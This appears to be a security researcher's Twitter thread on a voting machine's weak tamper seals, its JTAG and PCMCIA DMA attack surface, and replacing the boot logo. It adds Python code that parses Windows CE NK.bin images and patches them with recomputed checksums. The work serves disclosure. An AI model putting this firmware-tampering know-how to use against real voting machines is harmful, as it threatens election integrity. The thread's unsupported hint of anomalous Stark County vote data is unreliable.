Legally purchased. No contract or end user agreement has been entered into by the researcher. Good faith security research conducted pursuant to the Librarian of Congress’s DMCA exception attached below.pic.twitter.com/RmjhTaYVYm
Manufacturer “tamper evident” seal, and origin of machine.pic.twitter.com/OcYwTmUOxT
Stark County, Ohio has one of the strangest patterns of voter data I examined, departing drastically, erratically, and inexplicably from voting norms. The area contains 375,165 people.pic.twitter.com/88idWbV08s
Building on the work of @securelyfitz at DEFCON 25 Voting Machine Hacking Village, halted CPU via the internal JTAG interface prior to boot, did forensic extraction via SPI & JTAG of EPROM and Flash memory, using @dangerousproto BPirate v3.6.
Extracted OS contents of NK.bin.
pic.twitter.com/q7TOcYLAug
We're going to have some fun with this and you're all going to learn a bit. But I can already tell you a person could walk up to one of these machines, hack it, and walk away in less than a minute, unnoticed in public leaving no trace, altering an entire county's vote total.
Inadequate physical security + DMA over PCMCIA + virus spread via Compact Flash to GEMS County totaling system, for all the Mr. Robot fans playing along at home.
We’re going to do a few things: 1. Build a test device for the fast attack scenario, or if time and the extra $500 get the better of me, describe it in detail. 2. Demonstrate how easy it is to change votes, alter the OS, and have fun. 3. Forensically look for malware traces.
My primary goal is to forensically examine every shred of programmable memory on the device to determine if anything malicious was loaded, even if it was deleted.
And @PutinRF_Eng, let me make something clear: If malware was ever there, we will find it.pic.twitter.com/NSMHowMYlj
Americans also need to start holding @EACgov accountable. This machine is *currently* Federally certified as meeting a security standard.
Both state Secretaries of State and the EAC need robust challenge processes, not reviews by industry-captured “labs.” https://www.eac.gov/file.aspx?A=aglE75KwcKu6qnU6c3qTUK5Q6%2f6GJ3TizHHVpucJCfQ%3d …
Let’s discuss the serious issue which makes these machines particularly problematic. It’s this cover on the side. You can see it’s sealed with a “tamper-evident” sticker and a lock. We’ll quickly show how those don’t actually work, and why that’s a problem.pic.twitter.com/rAey7SKxEy
Security audits of Premier Election Solutions (formerly known as Diebold) machines inevitably say: “They’re horribly insecure if you open them, but all the access ports are physically locked and have special stickers to show if they’ve been opened. So it’s totally fine.” Wrong.
That door I showed you can be opened in a few seconds, while locked & leaving the seal intact. Because the plastic is soft, and is secured in the rear only by a plastic tab, it can be opened with a popsicle stick. (Here I use a professional’s popsicle stick, a plastic spudger.)pic.twitter.com/sEX72sPnAt
Opening that grants access to two potential points of entry: a PCMCIA slot and a telephone modem. Let’s talk about PCMCIA first, because it’s worse. PCMCIA was designed to connect high-speed devices to a computer, and as a result the bus can give a card what’s called DMA: “Direct Memory Access,” the ability to move data to and from system memory on its own. (Check which flavour the slot speaks before assuming this: a 32-bit CardBus card can bus-master, while a 16-bit PC Card only gets memory and I/O windows that the host maps for it.) pic.twitter.com/slCCzr6sQO
DMA is good because it lets the computer move data around without occupying the CPU. But it is very, very bad when security is a factor, because it operates below everything the CPU enforces: page permissions, kernel/user separation and whatever the OS does to protect its own code mean nothing to a device writing physical memory directly. The only thing that can police such a device is an IOMMU restricting which addresses it may touch, and a platform without one has no answer at all. pic.twitter.com/D4PoYBEbdU
Anyone with access to a DMA-capable peripheral connection is therefore highly likely to be able to seize control of the machine: they can read and write physical RAM at will, and from there patch the running kernel, lift keys and passwords out of memory, and rewrite the storage that holds the OS. This jeopardizes encryption schemes and OS defenses, and renders anti-malware useless.
So what could an attacker do with off-the-shelf technology and that PCMCIA slot? Well, pretty much anything they wanted. They can bypass passwords, change data, overwrite everything down to the code that loads the operating system, and plant viruses that are almost impossible to find. pic.twitter.com/t9WirsTckd
This machine has a memory card for the battery controller with a few megabytes of extra space. Do you know how many civilian anti-virus programs scan the battery controller chip’s memory? None. Sophisticated malware takes root well below the operating system, where it hides... pic.twitter.com/vkaQUMgYZk
Those locations, the deep, dark, obscure corners of computing, are where the best hackers ply their trade. That’s where we’re going to shine a light. Later we’ll talk about how an attacker’s virus could hitch a ride to a county’s central computer, and why printed backups are useless. pic.twitter.com/nu9xngqZt9
Great Q. Some areas place machines behind curtains or booths, others rely on minimal privacy screens. A trained clandestine service operator would have specialized equipment and months of rote practice. I can already do it fairly discreetly after a day. https://twitter.com/bigreebokdawg/status/1020321436047568896?s=21 …
In looking at responses, I must clarify: the point of this thread is not that we are doomed and should not vote.
It’s that we are watching.
It’s that we need every last one of us to vote. #TooBigToRig
First thing we're going to do is a simple hack, loading a custom image graphic onto the machine.
First thing’s first. We connect a probe to individual chips, extract their memory one by one, so we’re certain we have a high-quality copy of everything. This is... tedious. I’ll describe it in detail later, with lots of photos.
Let’s jump straight to the fun part. We unscrew the back cover of the machine (regular Phillips screws, not even a T6 or a security screw). Lots of interesting stuff on the board we’ll go over, but in the top right we spy an open JTAG interface. So we connect to the board. pic.twitter.com/cPUS3mlvWf
Thanks to @securelyfitz we know the board and its pinouts. So we fire up openocd, and dump everything we can access.
To simplify, what we’ve done is use a low-level debugging interface that the people who design and test the circuit boards rely on. It gives direct control over the CPU (halt it, single-step it, read and write its registers) and, through the CPU, over any memory it can address. So we halt the CPU before the OS gets a chance to run, and dump an image of all the accessible memory. One caveat: a JTAG dump shows memory as the CPU sees it, and a flash part may not be mapped in full or at all, which is why reading each chip directly with a probe remains the ground truth.
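Before trusting a dump enough to diff it or carve it, a practitioner takes it twice and compares the two copies, then notes which regions are erased flash (solid 0xFF) and which still hold data. The following is an added example, not code from the thread or from @securelyfitz’s work: a small Python checker for two acquisitions of the same region (for instance two files written by OpenOCD’s `dump_image`). The two sample dumps are constructed inline, with a handful of bit flips in the second copy and a leftover fragment sitting in otherwise erased flash; they are not data from the machine.

```python
import hashlib
from typing import List, Tuple

Span = Tuple[int, int]  # (offset, length)


def differing_ranges(a: bytes, b: bytes) -> List[Span]:
    """Spans where two dumps of the same region disagree.

    A second acquisition that matches the first is the cheapest evidence that
    the probe, clock speed and wiring were stable. Any span reported here has
    to be re-read before anything found in it is believed.
    """
    if len(a) != len(b):
        raise ValueError(f"dump sizes differ: {len(a)} vs {len(b)}")
    spans: List[Span] = []
    start = None
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y and start is None:
            start = i
        elif x == y and start is not None:
            spans.append((start, i - start))
            start = None
    if start is not None:
        spans.append((start, len(a) - start))
    return spans


def erased_ranges(dump: bytes, min_len: int = 16) -> List[Span]:
    """Spans of at least min_len bytes of 0xFF, i.e. erased NOR/NAND flash.

    Anything outside these spans is either live data or deleted-but-not-yet-
    erased data and is worth carving; anything inside is genuinely gone.
    """
    spans: List[Span] = []
    i, n = 0, len(dump)
    while i < n:
        if dump[i] != 0xFF:
            i += 1
            continue
        j = i
        while j < n and dump[j] == 0xFF:
            j += 1
        if j - i >= min_len:
            spans.append((i, j - i))
        i = j
    return spans


def fingerprint(dump: bytes) -> str:
    """SHA-256 of the dump, recorded with the acquisition notes."""
    return hashlib.sha256(dump).hexdigest()


# Constructed sample (assumption, not real machine contents): 256 bytes of
# "firmware" with no 0xFF bytes, 64 bytes of erased flash, a 32-byte leftover
# fragment that was never erased, then erased flash to the end of 512 bytes.
FIRMWARE = bytes(i & 0x7F for i in range(256))
LEFTOVER = b"old.bmp\x00" * 4
DUMP_A = FIRMWARE + b"\xff" * 64 + LEFTOVER + b"\xff" * (512 - 256 - 64 - len(LEFTOVER))

# Second acquisition with two single-bit read errors, one inside erased flash.
_b = bytearray(DUMP_A)
_b[10] ^= 0x01
_b[300] ^= 0x80
DUMP_B = bytes(_b)

if __name__ == "__main__":
    print("sha256 A:", fingerprint(DUMP_A))
    print("sha256 B:", fingerprint(DUMP_B))
    print("re-read these spans:", differing_ranges(DUMP_A, DUMP_B))
    print("erased spans:", erased_ranges(DUMP_A))
```

The erased-span list is what makes the “even if it was deleted” goal concrete: on raw flash, a deleted file is only gone once its block has been erased, so the 32-byte fragment between the two erased spans is exactly the kind of residue a forensic pass goes looking for.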
Now we're going to run through the bootchain until the Windows CE image is verified and extracted, then replace the file of the original voting machine logo (left) with our version (right).pic.twitter.com/muhl4xpmFk
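The “verified” step is the checksum on each record of the Windows CE .bin container that NK.bin uses: a 7-byte `B000FF\n` signature, the image start address and length, then a series of (address, length, checksum, data) records, closed by a record with address 0 whose length field carries the entry point. The checksum is a plain 32-bit byte sum, so it catches a bad transfer, not tampering: whoever can write the image just recomputes it. The following is an added example, not code from the thread or from the machine’s own bootloader: a Python parser that verifies the records, patches bytes at a physical address, and rebuilds the image with fresh checksums. The image, the addresses and the fake logo bytes are constructed here for illustration (the real logo lives inside the ROM file system, whose ROMHDR/TOC tables this example does not walk).

```python
import struct

MAGIC = b"B000FF\n"             # signature of a Windows CE .bin (NK.bin) image
HEADER = struct.Struct("<II")   # image start address, image length
RECORD = struct.Struct("<III")  # record address, record length, checksum


def _checksum(payload: bytes) -> int:
    # Byte sum truncated to 32 bits: integrity against corruption only.
    return sum(payload) & 0xFFFFFFFF


def parse_bin(image: bytes):
    """Return (start, length, entry, [(addr, payload), ...]) for a .bin image.

    Raises ValueError on a bad signature, a truncated record, a missing
    terminating record or a checksum mismatch, mirroring what a loader checks.
    """
    if image[:len(MAGIC)] != MAGIC:
        raise ValueError("not a Windows CE .bin image")
    start, length = HEADER.unpack_from(image, len(MAGIC))
    off = len(MAGIC) + HEADER.size
    records = []
    while True:
        if off + RECORD.size > len(image):
            raise ValueError("image ends before the terminating record")
        addr, rlen, chk = RECORD.unpack_from(image, off)
        off += RECORD.size
        if addr == 0 and chk == 0:
            return start, length, rlen, records   # rlen holds the entry point
        payload = image[off:off + rlen]
        if len(payload) != rlen:
            raise ValueError(f"truncated record at 0x{addr:08x}")
        if _checksum(payload) != chk:
            raise ValueError(f"checksum mismatch in record at 0x{addr:08x}")
        records.append((addr, payload))
        off += rlen


def build_bin(start: int, length: int, entry: int, records) -> bytes:
    """Serialize records back into a .bin image, recomputing every checksum."""
    out = bytearray(MAGIC) + HEADER.pack(start, length)
    for addr, payload in records:
        out += RECORD.pack(addr, len(payload), _checksum(payload)) + payload
    out += RECORD.pack(0, entry, 0)
    return bytes(out)


def patch_bytes(records, addr: int, new_bytes: bytes):
    """Copy of records with new_bytes written at physical address addr.

    The write must fall entirely inside one record; a loader maps records
    individually, so spanning two of them would not land where intended.
    """
    patched, hit = [], False
    for raddr, payload in records:
        if raddr <= addr and addr + len(new_bytes) <= raddr + len(payload):
            buf = bytearray(payload)
            o = addr - raddr
            buf[o:o + len(new_bytes)] = new_bytes
            payload, hit = bytes(buf), True
        patched.append((raddr, payload))
    if not hit:
        raise ValueError(f"0x{addr:08x} is not inside any record")
    return patched


# Constructed sample image (assumed layout and addresses, not the machine's):
# record 1 holds the "ECEC" ROMHDR pointer at start+0x40, record 2 a fake
# 48-byte "bitmap" standing in for the logo (16-byte header + 32 bytes pixels).
IMG_START = 0x80040000
ROM_PTR = IMG_START + 0x40
LOGO_ADDR = 0x80050000
LOGO = b"BM" + b"\x00" * 14 + b"OLD-LOGO" * 4
SAMPLE = build_bin(IMG_START, 0x20000, IMG_START + 0x1000,
                   [(ROM_PTR, b"ECEC" + struct.pack("<I", 0x80042000)),
                    (LOGO_ADDR, LOGO)])


def swap_logo(image: bytes, new_pixels: bytes) -> bytes:
    """The attack step: parse, overwrite the logo pixels, rebuild with fresh sums."""
    start, length, entry, records = parse_bin(image)
    records = patch_bytes(records, LOGO_ADDR + 16, new_pixels)
    return build_bin(start, length, entry, records)


def tamper_without_checksum(image: bytes) -> bool:
    """Flip one logo byte in the serialized image and leave the checksum stale.

    Returns True if parse_bin rejects the result, which is all the checksum
    buys: it stops a sloppy edit, not a deliberate one.
    """
    buf = bytearray(image)
    idx = len(buf) - RECORD.size - len(LOGO) + 16   # first pixel byte of the logo
    buf[idx] ^= 0xFF
    try:
        parse_bin(bytes(buf))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    start, length, entry, recs = parse_bin(SAMPLE)
    print(f"start=0x{start:08x} entry=0x{entry:08x} records={len(recs)}")
    print("stale checksum rejected:", tamper_without_checksum(SAMPLE))
    print("swapped logo verifies:", parse_bin(swap_logo(SAMPLE, b"NEW-LOGO" * 4))[3][1][1][16:48])
```

The point worth taking from `tamper_without_checksum` versus `swap_logo` is that the only difference between a rejected image and an accepted one is recomputing a byte sum; nothing in the container binds it to a key the attacker lacks, so a custom logo, or a custom anything, verifies just as well as the original.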